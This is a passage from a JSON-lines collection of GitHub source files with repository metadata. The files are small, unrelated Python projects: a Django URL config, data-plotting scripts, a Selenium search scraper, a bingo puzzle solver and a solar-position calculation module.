plt.legend(['Device->Host(Single Linear regression)', 'Device->Host(interpolate linear)', 'Device->Host(Mixed Linear regression(4))'], loc='best')\n plt.ylabel('Error(0-1)')\n plt.xlabel('Bytes')\n plt.title('Prediction Error (0-' + str(plot_up_bound) + ' bytes)')\n plt.savefig(resDir + 'Error_'+ machine + '_' + str(plot_up_bound) + '_bytes_device_to_host.eps', format='eps')\n plt.close()\n\n\nplot_transfers(1e4)\nplot_transfers(1e5)\nplot_transfers(1e6)\n\n","repo_name":"p-anastas/Heter_BLAS_explore","sub_path":"test_possible_functions.py","file_name":"test_possible_functions.py","file_ext":"py","file_size_in_byte":9929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} 
+{"seq_id":"14637400199","text":"from django.urls import path\nfrom .api_views import NotificationsModelViewSet\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom .api_views import TokenView\n\n\nurlpatterns = [\n path('notifications/', NotificationsModelViewSet.as_view(\n {\n 'get':'list',\n 'post':'create', \n }\n )\n ),\n\n path('notifications/', NotificationsModelViewSet.as_view(\n {\n 'get_by_id':'retrieve',\n 'put':'update',\n 'patch':'partial_update',\n 'delete':'destroy'\n }\n )),\n # We can use TokenView.TokenObtainPairView())view from library instead of custom class TokenView() that we created\n path('auth/token/', TokenView.as_view()) \n \n]","repo_name":"ibrahimshaabann/Xware-BootCamp","sub_path":"Content/week6/Day4/Notifications/NotificationsApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9006315446","text":"import matplotlib\nmatplotlib.use('WXAgg')\n\nclass Settings():\n def __init__(self):\n #Constructor\n #Set variables to the default\n self.colLength = 1.0\n self.colDiameter = 4.0\n self.arduinoPath = \"/dev/ttyACM0\"\n self.enableSimulation = \"False\"\n\n \n def loadSettings(self):\n #Read in Settings\n try:\n file1 = open(\"settings.ini\", \"r\")\n SettingsFile = file1.readlines() \n file1.close()\n \n print(SettingsFile)\n \n for x in SettingsFile:\n ID = (x[0:x.find(\"=\")]) \n value = (x[x.find(\"=\")+1 :]) \n \n if (ID == \"COLUMN_LENGTH\"): self.colLength = float(value)\n if (ID == \"COLUMN_DIAMETER\"): self.colDiameter = float(value)\n if (ID == \"ARDUINO_PATH\"): self.arduinoPath = str(value[:-1]) #Cut-off \\n\n if (ID == \"SIMULATION\"): self.enableSimulation = str(value[:-1]) #Cut-off \\n\n \n except:\n print(\"ERROR while loading settings data\")\n \n def saveSettings(self):\n try:\n #Write Settings file\n f = open(\"settings.ini\", \"w\")\n f.write(\"COLUMN_LENGTH=\" + str(self.colLength) + \"\\n\") \n f.write(\"COLUMN_DIAMETER=\" + str(self.colDiameter) + \"\\n\")\n f.write(\"ARDUINO_PATH=\" + str(self.arduinoPath) + \"\\n\")\n f.write(\"SIMULATION=\" + str(self.enableSimulation) + \"\\n\") \n f.close()\n except:\n print(\"ERROR while saving settings data\")\n \n","repo_name":"JoStoe/GCControl","sub_path":"src/SettingsClass.py","file_name":"SettingsClass.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42078055080","text":"import pandas as pd\nimport shapely.geometry\nimport xarray as xr\nimport tracpy\nimport matplotlib.pyplot as plt\nimport cartopy\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\nimport cmocean.cm as cmo\nimport matplotlib as mpl\nimport numpy as np\nimport os\n\n# load in gulf ssh\nloc = 'output/*.nc'\nds = xr.open_mfdataset(loc)\nlats = ds['latitude']\nlons = ds['longitude']\n# grid_file = '../gom03_grd_N050_new.nc'\n# grid = xr.open_dataset(grid_file)\n# proj = tracpy.tools.make_proj('nwgom-pyproj')\n# grid = tracpy.inout.readgrid(grid_file, proj=proj)\n\n# load in drifter data\ndfmix = pd.read_csv('drifter-09_04_18-07_37.csv', usecols=[0,1,4,5], parse_dates=True, index_col=1)\ndfmix = dfmix[::-1]\ndrifters = list(dfmix['DeviceName'].unique()) # drifter names\n\n# interpolate all drifters to standard times\n# each df in dfs is a drifter lon/lat\n# start when drifter is near eddy, but at hour\ndstart = '2018-8-12 18:00' # dfmix.index[(dfmix['Longitude'] 
< -90) * (dfmix['Latitude'] < 28)][0].floor('H')\nindices = pd.date_range(start=dstart, end=dfmix.index.max(), freq='6H')\ndfs = []\nfor drifter in drifters:\n df = pd.DataFrame(index=indices)\n df = dfmix[dfmix['DeviceName']==drifter].resample('1H', base=0).mean()\n dfs.append(df)\n\n# plot prep\nland_50m = cartopy.feature.NaturalEarthFeature('physical', 'land', '50m')\npc = cartopy.crs.PlateCarree()\nmerc = cartopy.crs.Mercator(central_longitude=-85.0)\nextent = [-98, -85, 22, 31]\n\n# loop over drifter times\nfor index in indices:\n\n fname = 'figures/%s.png' % (index.isoformat()[:13])\n\n if os.path.exists(fname):\n continue\n\n fig = plt.figure(figsize=(8,6))# (9.4, 7.7))\n ax = fig.add_subplot(111, projection=merc)\n # ax = fig.add_axes([0.06, 0.01, 0.93, 0.95], projection=merc)\n ax.set_extent(extent, pc)\n gl = ax.gridlines(linewidth=0.2, color='gray', alpha=0.5, linestyle='-', draw_labels=True)\n # the following two make the labels look like lat/lon format\n gl.xformatter = LONGITUDE_FORMATTER\n gl.yformatter = LATITUDE_FORMATTER\n gl.xlocator = mpl.ticker.FixedLocator(np.arange(-100, -70, 2))\n gl.ylocator = mpl.ticker.FixedLocator(np.arange(10, 31, 2))\n gl.xlabels_top = False # turn off labels where you don't want them\n gl.ylabels_right = False\n # add background land\n ax.add_feature(land_50m, facecolor='0.8', edgecolor='0.2', linewidth=1)\n\n # use nearest model output\n ssh = ds['zos'].sel(time=index, method='nearest')\n u = ds['uo'].sel(time=index, method='nearest').isel(depth=0)\n v = ds['vo'].sel(time=index, method='nearest').isel(depth=0)\n\n mappable = ax.pcolormesh(lons, lats, ssh, transform=pc,\n cmap=cmo.balance, vmin=-0.5, vmax=0.5)\n cb = fig.colorbar(mappable, shrink=0.8, extend='both')\n cb.set_label('Sea surface height [m]')\n\n # overlay velocities\n dd = 5\n ax.quiver(lons[::dd].values, lats[::dd].values,\n u[::dd,::dd].values, v[::dd,::dd].values, transform=pc, alpha=0.6)\n\n\n # overlay drifters\n for i in range(3):\n try:\n lat, lon = dfs[i].loc[index]\n ax.plot(lon, lat, 'ok', transform=pc)\n except:\n pass\n\n ax.set_title(index.strftime('%b %d %H:%M, %Y'))\n\n # add labels\n # drifter legend\n ax2 = fig.add_axes([0.125, 0.625, 0.15, 0.2], frameon=False)\n ax2.scatter([], [], c='0.2', s=30, marker='o', label='Drifter')\n ax2.legend(scatterpoints=1, frameon=False, loc='upper left')\n ax2.set_axis_off()\n # label mercator\n ax.text(0.3, 0.96, 'Mercator model output', color='0.2', transform=ax.transAxes)\n # my name\n ax.text(0.8, 0.96, 'K. 
Thyng', color='0.2', transform=ax.transAxes)\n\n\n    fig.savefig(fname, bbox_inches='tight')\n    plt.close(fig)\n","repo_name":"kthyng/oem","sub_path":"drifter_animation/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"37259267085","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 28 09:50:47 2022\n\n@author: Marcu\n\"\"\"\nimport numpy as np\n\nfrom itertools import groupby\nfrom operator import itemgetter\n\n#%% Image preprocessing\n\ndef grassfire(img, N,p):\n    # Function which finds pixels that deviate by more than p percent\n    # from the average pixelvalue in an NxN neighborhood\n    \n    #INPUT\n    #img: binary or greyscale image\n    #N: half of width of neighborhood\n    #p: percentwise difference required to denote a pixel as an \"island\"\n    \n    #OUTPUT\n    #Binary image, showing the \"islands\" in the image with the pixelvalue \"1\"\n    \n    \n    n,m = np.shape(img)\n    mask = np.zeros((n,m))\n    for i in range(n):\n        for j in range(m):\n            l = N\n            r = N\n            u = N\n            d = N\n            if i < N:\n                u = i\n            elif i > n-N:\n                d = n-i-1\n            if j < N:\n                l = j\n            elif j > m-N:\n                r = m-j-1\n            kern = img[i-u:i+d,j-l:j+r]\n            nk,mk = np.shape(kern)\n            avg = sum(sum(kern))/(nk*mk)\n            deviate = abs((avg-img[i,j])/avg)\n            if deviate > p:\n                mask[i,j] = 1\n    return mask\n\n\ndef find_lines(img,tol):\n    #finds vertical black lines in an image\n    #\n    #INPUT\n    #img: greyscale image\n    #tol: line pixelvalue threshold\n    \n    #OUTPUT\n    #lines: column indexes for vertical lines\n\n    n,m = np.shape(img)\n    lines = []\n    for j in range(1,m):\n        avg = sum(img[:,j])/n\n        if avg < tol:\n            lines.append(j)\n    return lines\n\ndef remove_lines(img,lines):\n    #removes vertical lines from image\n    \n    #INPUT\n    #img: grayscale image\n    #lines: column index for vertical lines\n    \n    #OUTPUT\n    #img: Image without vertical lines\n    lines = sorted(set(lines))\n    gaps = [[s, e] for s, e in zip(lines, lines[1:]) if s+1 < e]\n    edges = iter(lines[:1] + sum(gaps, []) + lines[-1:])\n    edges = list(zip(edges, edges))\n    for edge in edges:\n        try:\n            filt = (img[:,edge[0]-3] + img[:,edge[1]+3])/2\n        except IndexError:\n            if edge[0]<3:\n                filt = img[:,edge[1]+3]\n            else:\n                filt = img[:,edge[0]-3]\n        \n        for line in range(edge[0]-2,edge[1]+2):\n            img[:,line] = filt\n    return img\n    \n    \n\n    \n    \n","repo_name":"MarcusGalea/Bachelor-project","sub_path":"scripts/preprocessing/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"22068928699","text":"import pytest\nfrom credit.models import Credit\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom tests import factories\n\n\n@pytest.mark.usefixtures(\n    \"auth_user\",\n    \"client\",\n    \"credit_data\",\n    \"account_credit_data\",\n    \"agreement_credit_data\",\n    \"payment_schedule_credit_data\",\n)\nclass TestCreditPaymant:\n    @pytest.mark.django_db\n    def test_credit_product_get_request_auth_user(\n        self,\n        auth_user,\n        client,\n    ):\n        client.force_authenticate(user=auth_user)\n        factories.Credit()\n        response = client.get(\n            path=reverse(\"credit:get_credit_payment_schedule\", kwargs={\"creditId\": 1})\n        )\n        assert len(Credit.objects.all()) == 1\n        assert response.status_code == 
status.HTTP_200_OK\n","repo_name":"x3m4ikc/bank_service_credit","sub_path":"tests/credit/test_credit_shedule.py","file_name":"test_credit_shedule.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10761102127","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\n\n\"\"\" driver = webdriver.Chrome(executable_path='C:\\\\Users\\Dell\\Desktop\\Growbydata\\chromedriver.exe') \n\ndriver.get('https://www.google.com/search?q=amazon&rlz=1C1GCEB_enNP875NP875&biw=1536&bih=431&sxsrf=ALiCzsaM83EX1Kbm7f6MCjmao8tmQhKQ-w%3A1670391889539&ei=USiQY7rEILmuseMPwbKU2A4&ved=0ahUKEwj6sNjZ5ub7AhU5V2wGHUEZBesQ4dUDCA8&uact=5&oq=amazon&gs_lcp=Cgxnd3Mtd2l6LXNlcnAQAzIECAAQRzIECAAQRzIECAAQRzIECAAQRzIECAAQRzIECAAQRzIECAAQRzIECAAQR0oECEEYAEoECEYYAFD5A1j5A2DvBWgAcAJ4AIABAIgBAJIBAJgBAKABAcgBCMABAQ&sclient=gws-wiz-serp')\n \"\"\"\ndriver = webdriver.Chrome(executable_path='C:\\\\Users\\Dell\\Desktop\\Growbydata\\chromedriver.exe')\ndriver.implicitly_wait(2) \ndriver.get(\"https://www.google.com/\") \n\n\nclass A:\n\n def search():\n x= input(\"enter any value \")\n return x\n driver.find_element_by_name(\"q\").send_keys(search()) \n #click on the Google search button \n driver.find_element_by_xpath('//body/div[1]/div[3]/form[1]/div[1]/div[1]/div[4]/center[1]/input[1]').click()\n print(driver.title)\n\n\ndesc=driver.find_elements(By.XPATH,'//div[@class=\"VwiC3b yXK7lf MUxGbd yDYNvb lyLwlc lEBKkf\"] | //div[@class=\"VwiC3b yXK7lf MUxGbd yDYNvb lyLwlc\"]')\ndesc_list=[]\nfor d in desc:\n if d.text ==\"\":\n desc_list.append(\"(Not Found)\")\n else: \n desc_list.append(d.text)\nprint(desc_list)\n\n\n\n\n#dont Touch\ntitle=driver.find_elements(By.XPATH, '//div[@class=\"yuRUbf\"]//h3[@class=\"LC20lb MBeuO DKV0Md\"]')\ntitle_list=[]\nfor t in title:\n if t.text ==\"\":\n title_list.append(\"(Not Found)\")\n else: \n title_list.append(t.text)\nprint(title_list)\n\n\n\n#dont Touch\nLink=driver.find_elements(By.XPATH, '//div[@class=\"TbwUpd NJjxre\"]//cite')\nLink_list=[]\nfor L in Link:\n if L.text ==\"\":\n Link_list.append(\"(Not Found)\")\n else: \n Link_list.append(L.text)\nprint(Link_list)\n\nthis_dics={\n \"desc\":desc_list[:],\n \"links\":Link_list[:],\n \"title\":title_list[:]\n}\nprint(this_dics)\ndriver.quit()\nprint(len(desc_list))\nprint(len(Link_list))\nprint(len(title_list))\n\n\nnew = pd.DataFrame.from_dict(this_dics)\n \nnew.to_csv('this2.csv')","repo_name":"Abhishekkc010/seleniumwebscrape","sub_path":"orgamazon.py","file_name":"orgamazon.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1197299250","text":"# a = int(input())\n# b = int(input())\n# print(f'Квадрат суммы {a} и {b} равен', (a+b)**2)\n# print(f'Сумма квадратов {a} и {b} равна', a**2 + b**2)\na = int(input())\nb = int(input())\nc = int(input())\n# d = int(input())\nsumma = 0\nif a > 0:\n summa = summa + a\nif b > 0:\n summa = summa + b\nif c > 0:\n summa = summa + c\nprint(summa)\n# ab = 0\n# cd = 0\n# if a <= 13:\n# print('детство')\n# elif a <= 24:\n# print('молодость')\n# elif a <= 59:\n# print('зрелость')\n# elif a >= 60:\n# print('старость')\n\n# print(a**b + c**d)\n#a = int(input())\n# aa = 10*a + a\n# aaa = 100*a + aa\n# print(a + aa + 
aaa)\n# n = int(input())\n# print(n * 123)\n","repo_name":"Let0Pda/Python_Lectures","sub_path":"stepik.py","file_name":"stepik.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"19483588525","text":"import copy\n\n\ndef bingo_round(number, board):\n    bingo = False\n    for row in range(len(board)):\n        for column in range(len(board[row])):\n            if board[row][column] == number:\n                board[row][column] = None\n                board_column = [board[i][column] for i in range(len(board))]\n                board_row = board[row]\n                if (board_row[0] is None and len(set(board_row)) == 1) or (\n                    board_column[0] is None and len(set(board_column)) == 1\n                ):\n                    bingo = True\n    return bingo\n\n\ndef play_bingo(numbers, boards):\n    winning_board = None\n    bingo = False\n    for number in numbers:\n        for board in boards:\n            current_board_bingo = bingo_round(number, board)\n            if current_board_bingo and not bingo:\n                bingo = True\n                winning_board = board\n        if bingo:\n            return True, number, winning_board\n    return False, number, None\n\n\ndef calculate_board_sum_unmarked(board):\n    sum = 0\n    for row in board:\n        for num in row:\n            if num:\n                sum += num\n    return sum\n\n\ndef puzzle1(data):\n    numbers, boards = data\n    bingo, number, board = play_bingo(numbers, boards)\n    if bingo:\n        sum = calculate_board_sum_unmarked(board)\n        print(\"Puzzle 1: \", sum * number)\n    else:\n        print(\"Puzzle 1: no board won, should not happen\")\n\n\ndef puzzle2(data):\n    numbers, boards = data\n    last_winning_board = None\n    last_winning_number = None\n    for number in numbers:\n        winning_boards = []\n        for board in boards:\n            bingo = bingo_round(number, board)\n            if bingo:\n                winning_boards.append(board)\n                last_winning_board = board\n                last_winning_number = number\n        for board in winning_boards:\n            boards.remove(board)\n    sum = calculate_board_sum_unmarked(last_winning_board)\n    print(\"Puzzle 2: \", sum * last_winning_number)\n\n\ndef parse_input(data):\n    numbers_line = data.split(\"\\n\")[0]\n    numbers = [int(n) for n in numbers_line.split(\",\")]\n    board_lines = data.split(\"\\n\\n\")[1:]\n    boards = []\n    for board_line in board_lines:\n        board = []\n        for line in board_line.split(\"\\n\"):\n            if line.strip() != \"\":\n                board_numbers = []\n                board_numbers_splitted = line.split(\" \")\n                for number in board_numbers_splitted:\n                    if number:\n                        board_numbers.append(int(number))\n                board.append(board_numbers)\n        boards.append(board)\n    return numbers, boards\n\n\ndef main():\n    with open(\"input/input_day04.txt\") as f:\n        data = f.read()\n    data = parse_input(data)\n    puzzle1(copy.deepcopy(data))\n    puzzle2(data)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Horrendus/advent_of_code","sub_path":"2021/2021_day04.py","file_name":"2021_day04.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"37372529592","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.rcParams['font.sans-serif']='SimHei' #set a Chinese font\nn=24\ny1=np.random.randint(27,37,n) #temperature\ny2=np.random.randint(40,60,n) #humidity\nplt.plot(y1,label='温度')\nplt.plot(y2,label='湿度')\n\nplt.xlim(0,23) #set x-axis range\nplt.ylim(20,70)\nplt.xlabel('小时',fontsize=12)\nplt.ylabel('测量值',fontsize=12)\n\nplt.title('24小时温度湿度统计',fontsize=16)\n\nplt.legend() 
#show legend\nplt.show()","repo_name":"chaozuoye/ai","sub_path":"神网/unit6/test_2.py","file_name":"test_2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"71163252065","text":"\nimport math as m\nfrom soltrack.data import PI, TWO_PI, R2D\nfrom soltrack.dataclasses import Location, Position, copyDataclass\n\n\n\ndef computeSunPosition(location, time, useDegrees=False, useNorthEqualsZero=False, computeRefrEquatorial=False, computeDistance=False):\n    \n    \"\"\"\n    Main function to compute the position of the Sun.\n    \n    Parameters:\n      location (Location): Dataclass containing the geographic location to compute the Sun's position for.\n      time (Time): Dataclass containing date and time to compute the position for, in UT.\n      \n      useDegrees (bool): Use degrees for input and output angular variables, rather than radians (optional, default=False).\n      useNorthEqualsZero (bool): Use the definition where azimuth=0 denotes north, rather than south (optional, default=False).\n      computeRefrEquatorial (bool): Compute refraction correction for equatorial coordinates (optional, default=False).\n      computeDistance (bool): Compute distance to the Sun (optional, default=False).\n    \n    Returns:\n      (Position): Dataclass containing the position of the Sun in horizontal (and equatorial if desired) coordinates (output).\n    \n    \"\"\"\n    \n    # If the user uses degrees, convert the geographic location to radians:\n    # In C, a local copy of location is made. With Python dataclasses, this doesn't seem to work (pointer?)\n    \n    loc = copyDataclass(Location, location) # Local copy of the Location dataclass\n    if(useDegrees):\n        loc.longitude /= R2D\n        loc.latitude /= R2D\n    \n    # Compute these once and reuse:\n    loc.sinLat = m.sin(loc.latitude)\n    loc.cosLat = m.sqrt(1.0 - loc.sinLat * loc.sinLat) # Cosine of a latitude is always positive or zero\n    \n    \n    # Create a Position object, to return the results:\n    position = Position()\n    \n    # Compute the Julian Day from the date and time:\n    position.julianDay = computeJulianDay(time.year, time.month, time.day, time.hour, time.minute, time.second)\n    \n    \n    # Derived expressions of time:\n    position.tJD = position.julianDay - 2451545.0 # Time in Julian days since 2000.0\n    position.tJC = position.tJD/36525.0 # Time in Julian centuries since 2000.0\n    position.tJC2 = position.tJC*position.tJC # T^2\n    \n    \n    # Compute the ecliptic longitude of the Sun and the obliquity of the ecliptic:\n    computeLongitude(position, computeDistance)\n    \n    # Convert ecliptic coordinates to geocentric equatorial coordinates:\n    position.rightAscension, position.declination = convertEclipticToEquatorial(position.longitude, position.cosObliquity)\n    \n    # Convert equatorial coordinates to horizontal coordinates, correcting for parallax and refraction:\n    convertEquatorialToHorizontal(loc, position)\n    \n    \n    # Convert the corrected horizontal coordinates back to equatorial coordinates:\n    if(computeRefrEquatorial):\n        position.hourAngleRefract,position.declinationRefract = \\\n            convertHorizontalToEquatorial(loc.sinLat, loc.cosLat, position.azimuthRefract,\n                                          position.altitudeRefract)\n    \n    # Use the North=0 convention for azimuth and hour angle (default: South = 0) if desired:\n    if(useNorthEqualsZero):\n        position.azimuthRefract, position.hourAngleRefract = setNorthToZero(position.azimuthRefract,\n                                                                            position.hourAngleRefract,\n                                                                            computeRefrEquatorial)\n    \n    # If the user wants degrees, convert final results from radians to degrees:\n    if(useDegrees):\n        
convertRadiansToDegrees(position, computeRefrEquatorial)\n \n return position\n \n\n\ndef computeJulianDay(year, month, day, hour, minute, second):\n \"\"\"Compute the Julian Day from the date and time.\n \n Note:\n - Gregorian calendar only (>~1582).\n \n Parameters:\n year (int): Year of date.\n month (int): Month of date.\n day (int): Day of date.\n hour (int): Hour of time.\n minute (int): Minute of time.\n second (int): Second of time.\n \n Returns:\n float: Julian day for the given date and time.\n \n \"\"\"\n \n if(month <= 2): # Treat Jan, Feb as months 13, 14 of the previous year\n year -= 1\n month += 12\n \n tmp1 = m.floor(year/100.0)\n tmp2 = 2 - tmp1 + m.floor(tmp1/4.0)\n \n dDay = day + hour/24.0 + minute/1440.0 + second/86400.0\n JD = m.floor(365.250*(year+4716)) + m.floor(30.60010*(month+1)) + dDay + tmp2 - 1524.5\n \n return JD\n\n\n\ndef computeLongitude(position, computeDistance=False):\n \"\"\"Compute the ecliptic longitude of the Sun for a given instant.\n \n Note:\n - Also computes the obliquity of the ecliptic and nutation.\n \n Parameters:\n position (Position): Dataclass containing the position of the Sun (I/O).\n computeDistance (bool): Compute distance to the Sun (optional, default=False).\n \n \"\"\"\n \n l0 = 4.895063168 + 628.331966786 * position.tJC + 5.291838e-6 * position.tJC2 # Mean longitude\n ma = 6.240060141 + 628.301955152 * position.tJC - 2.682571e-6 * position.tJC2 # Mean anomaly\n \n sec = (3.34161088e-2 - 8.40725e-5* position.tJC - 2.443e-7*position.tJC2)*m.sin(ma) + \\\n (3.489437e-4 - 1.76278e-6*position.tJC)*m.sin(2*ma) # Sun's equation of the centre\n odot = l0 + sec # True longitude\n \n \n # Nutation, aberration:\n omg = 2.1824390725 - 33.7570464271 * position.tJC + 3.622256e-5 * position.tJC2 # Lon. of Moon's mean ascending node\n dpsi = -8.338601e-5*m.sin(omg) # Nutation in longitude\n dist = 1.0000010178 # Mean distance to the Sun in AU\n if(computeDistance):\n ecc = 0.016708634 - 0.000042037 * position.tJC - 0.0000001267 * position.tJC2 # Eccentricity of the Earth's orbit\n nu = ma + sec # True anomaly\n dist = dist*(1.0 - ecc*ecc)/(1.0 + ecc*m.cos(nu)) # Geocentric distance of the Sun in AU\n \n aber = -9.93087e-5/dist # Aberration\n \n # Obliquity of the ecliptic and nutation - do this here, since we've already computed many of the ingredients:\n eps0 = 0.409092804222 - 2.26965525e-4*position.tJC - 2.86e-9*position.tJC2 # Mean obliquity of the ecliptic\n deps = 4.4615e-5*m.cos(omg) # Nutation in obliquity\n \n # Save position parameters:\n position.longitude = (odot + aber + dpsi) % TWO_PI # Apparent geocentric longitude, referred to the true equinox of date\n \n position.distance = dist # Distance (AU)\n \n position.obliquity = eps0 + deps # True obliquity of the ecliptic\n position.cosObliquity = m.cos(position.obliquity) # Need the cosine later on\n position.nutationLon = dpsi # Nutation in longitude\n \n return\n\n\n\ndef convertEclipticToEquatorial(longitude, cosObliquity):\n \"\"\"Convert ecliptic coordinates to equatorial coordinates.\n \n Note:\n - This function assumes that the ecliptic latitude = 0.\n \n Parameters:\n longitude (float): Ecliptic longitude of the Sun (rad).\n cosObliquity (float): Cosine of the obliquity of the ecliptic.\n \n Returns:\n tuple (float,float): Tuple containing (rightAscension, declination):\n \n - rightAscension (float): Right ascension of the Sun (rad).\n - declination (float): Declination of the Sun (rad).\n \n \"\"\"\n \n sinLon = m.sin(longitude)\n sinObl = 
m.sqrt(1.0-cosObliquity*cosObliquity) # Sine of the obliquity of the ecliptic will be positive in the forseeable future\n \n rightAscension = m.atan2(cosObliquity*sinLon, m.cos(longitude)) % TWO_PI # 0 <= azimuth < 2pi\n declination = m.asin(sinObl*sinLon)\n \n return rightAscension, declination\n\n\ndef convertEquatorialToHorizontal(location, position):\n \"\"\"Convert equatorial to horizontal coordinates.\n \n Also corrects for parallax and atmospheric refraction.\n \n Parameters:\n location (Location): Dataclass contaning the geographic location of the observer (rad).\n position (Position): Dataclass contaning the position of the Sun (rad, I/O).\n \n \"\"\"\n \n gmst = 4.89496121 + 6.300388098985*position.tJD + 6.77e-6*position.tJC2 # Greenwich mean sidereal time\n position.agst = gmst + position.nutationLon * position.cosObliquity # Correction for equation of the equinoxes . apparent Greenwich sidereal time\n \n \n sinAlt=0.0\n # Azimuth does not need to be corrected for parallax or refraction, hence store the result in the 'azimuthRefract' variable directly:\n position.azimuthRefract, sinAlt = eq2horiz(location.sinLat,location.cosLat, location.longitude, position.rightAscension, position.declination, position.agst)\n \n alt = m.asin( sinAlt ) # Altitude of the Sun above the horizon (rad)\n cosAlt = m.sqrt(1.0 - sinAlt * sinAlt) # Cosine of the altitude is always positive or zero\n \n # Correct for parallax:\n alt -= 4.2635e-5 * cosAlt # Horizontal parallax = 8.794\" = 4.2635e-5 rad\n position.altitude = alt\n \n # Correct for atmospheric refraction:\n dalt = 2.967e-4 / m.tan(alt + 3.1376e-3/(alt + 8.92e-2)) # Refraction correction in altitude\n dalt *= location.pressure/101.0 * 283.0/location.temperature\n alt += dalt\n # to do: add pressure/temperature dependence\n position.altitudeRefract = alt\n \n return\n\n\ndef eq2horiz(sinLat, cosLat, longitude, rightAscension, declination, agst):\n \"\"\"Convert equatorial coordinates to horizontal coordinates.\n \n Parameters:\n sinLat (float): Sine of the geographic latitude of the observer.\n cosLat (float): Cosine of the geographic latitude of the observer.\n longitude (float): Geographic longitude of the observer (rad).\n rightAscension (float): Right ascension of the Sun (rad).\n declination (float): Declination of the Sun (rad).\n agst (float): Apparent Greenwich sidereal time (Greenwich mean sidereal time, corrected for the equation of the equinoxes).\n \n Returns: \n tuple (float,float): Tuple containing (azimuth, sinAlt):\n \n - azimuth (float): Azimuth (\"wind direction\") of the Sun (rad; 0=South).\n - sinAlt (float): Sine of the altitude of the Sun above the horizon.\n \n \"\"\"\n \n ha = agst + longitude - rightAscension # Local Hour Angle\n \n # Some preparation, saves ~29%:\n sinHa = m.sin(ha)\n cosHa = m.cos(ha)\n \n sinDec = m.sin(declination)\n cosDec = m.sqrt(1.0 - sinDec * sinDec) # Cosine of a declination is always positive or zero\n tanDec = sinDec/cosDec\n \n azimuth = m.atan2( sinHa, cosHa * sinLat - tanDec * cosLat ) # 0 <= azimuth < 2pi\n sinAlt = sinLat * sinDec + cosLat * cosDec * cosHa # Sine of the altitude above the horizon\n \n return azimuth, sinAlt\n\n\ndef convertHorizontalToEquatorial(sinLat, cosLat, azimuth, altitude):\n \n \"\"\"Convert (refraction-corrected) horizontal coordinates to equatorial coordinates.\n \n Parameters:\n sinLat (float): Sine of the geographic latitude of the observer.\n cosLat (float): Cosine of the geographic latitude of the observer.\n azimuth (float): Azimuth (\"wind direction\") 
of the Sun (rad; 0=South).\n      altitude (float): Altitude of the Sun above the horizon (rad).\n    \n    Returns: \n      tuple (float,float): Tuple containing (hourAngle, declination):\n    \n      - hourAngle (float): Hour angle of the Sun (rad; 0=South).\n      - declination (float): Declination of the Sun (rad).\n    \n    \"\"\"\n    \n    # Multiply used variables:\n    cosAz = m.cos(azimuth)\n    sinAz = m.sin(azimuth) # For symmetry\n    \n    sinAlt = m.sin(altitude)\n    cosAlt = m.sqrt(1.0 - sinAlt * sinAlt) # Cosine of an altitude is always positive or zero\n    tanAlt = sinAlt/cosAlt\n    \n    hourAngle = m.atan2( sinAz, cosAz * sinLat + tanAlt * cosLat ) # Local Hour Angle: 0 <= hourAngle < 2pi\n    declination = m.asin( sinLat * sinAlt - cosLat * cosAlt * cosAz ) # Declination\n    \n    return hourAngle, declination\n\n\n\ndef setNorthToZero(azimuth, hourAngle, computeRefrEquatorial):\n    \"\"\"Convert the South=0 convention to North=0 convention for azimuth and hour angle.\n    \n    Note:\n      - South=0 is the default in celestial astronomy.\n      - This function makes the angles compatible with the compass/wind directions.\n    \n    Parameters:\n      azimuth (float): Azimuth (\"wind direction\") of the Sun (rad).\n      hourAngle (float): Hour angle of the Sun (rad).\n      computeRefrEquatorial (bool): Compute refraction correction for equatorial coordinates.\n    \n    Returns: \n      tuple (float,float): Tuple containing (azimuth, hourAngle):\n    \n      - azimuth (float): Azimuth (\"wind direction\") of the Sun (rad).\n      - hourAngle (float): Hour angle of the Sun (rad; 0=South).\n    \n    \"\"\"\n    \n    azimuth = (azimuth + PI) % TWO_PI # Add PI to set North=0\n    \n    if(computeRefrEquatorial):\n        hourAngle = (hourAngle + PI) % TWO_PI # Add PI to set North=0\n    \n    return azimuth, hourAngle\n\n\ndef convertRadiansToDegrees(position, computeRefrEquatorial):\n    \"\"\"Convert final results from radians to degrees.\n    \n    Note:\n      - Does not touch intermediate results.\n    \n    position (Position): Dataclass containing Sun position (I/O).\n    computeRefrEquatorial (bool): Compute refraction correction for equatorial coordinates.\n    \n    \"\"\"\n    \n    \n    position.longitude *= R2D\n    position.rightAscension *= R2D\n    position.declination *= R2D\n    \n    position.altitude *= R2D\n    position.azimuthRefract *= R2D\n    position.altitudeRefract *= 